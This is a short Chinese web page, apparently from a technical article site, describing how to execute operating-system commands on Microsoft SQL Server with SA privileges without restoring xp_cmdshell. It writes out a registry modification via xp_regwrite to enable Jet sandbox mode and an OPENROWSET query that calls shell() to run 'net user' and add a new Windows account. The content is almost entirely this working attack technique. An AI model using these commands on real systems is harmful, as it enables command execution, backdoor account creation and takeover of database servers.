当前位置:主页 > >

SA 沙盘模式下不用恢复xp_cmdshell和xplog70.dll也执行命令

时间:2020-10-06 21:54:11 | 栏目: | 点击:

首先开启沙盘模式:

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1


然后利用jet.oledb执行系统命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')

您可能感兴趣的文章:

相关文章